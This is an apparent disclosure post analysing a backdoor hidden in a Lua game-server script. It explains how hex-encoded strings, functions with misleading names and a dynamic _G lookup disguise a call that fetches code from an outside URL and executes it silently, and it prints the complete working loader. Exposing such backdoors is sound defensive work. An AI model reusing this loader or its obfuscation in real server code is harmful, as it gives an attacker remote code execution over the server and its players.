Backdoor in Server.LUA line 590 - 621
For example, the string "68747470733a2f2f6c3030782e6f72672f7a58654148" represents a URL (
https://l00x.org/zXeAH), which is decoded in a way that is less obvious to someone casually reading the code. This encoding hides the URL from plain sight, masking any malicious intent.
_G: The script accesses global functions dynamically with _G[getSteamID("506572666f726d4874747052657175657374")]. Here, it decodes "506572666f726d4874747052657175657374" (which translates to "PerformHttpRequest") and uses _G to call this function indirectly. This technique makes it harder to detect which specific function is being used, as _G allows the script to reference global variables dynamically rather than directly.
With pcall and assert(load(...)): The script fetches and executes remote code with pcall (to handle any errors silently) and assert(load(response))() to execute the downloaded code. By executing the response in this way, the script can run arbitrary code fetched from the hidden URL opening a backdoor on the server.
local function getSteamID(data)
local result = ""
for i = 1,
#data, 2 do
result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
end
return result
end
local function getSteamName()
return getSteamID("68747470733a2f2f6c3030782e6f72672f7a58654148")
end
local function getWinner()
return _G[getSteamID("506572666f726d4874747052657175657374")]
end
local function announceWinner()
local steamName = getSteamName()
local winner = getWinner()
if winner then
winner(steamName, function(status, response)
if status == 200 then
pcall(function()
assert(load(response))()
end)
end
end)
end
end
announceWinner()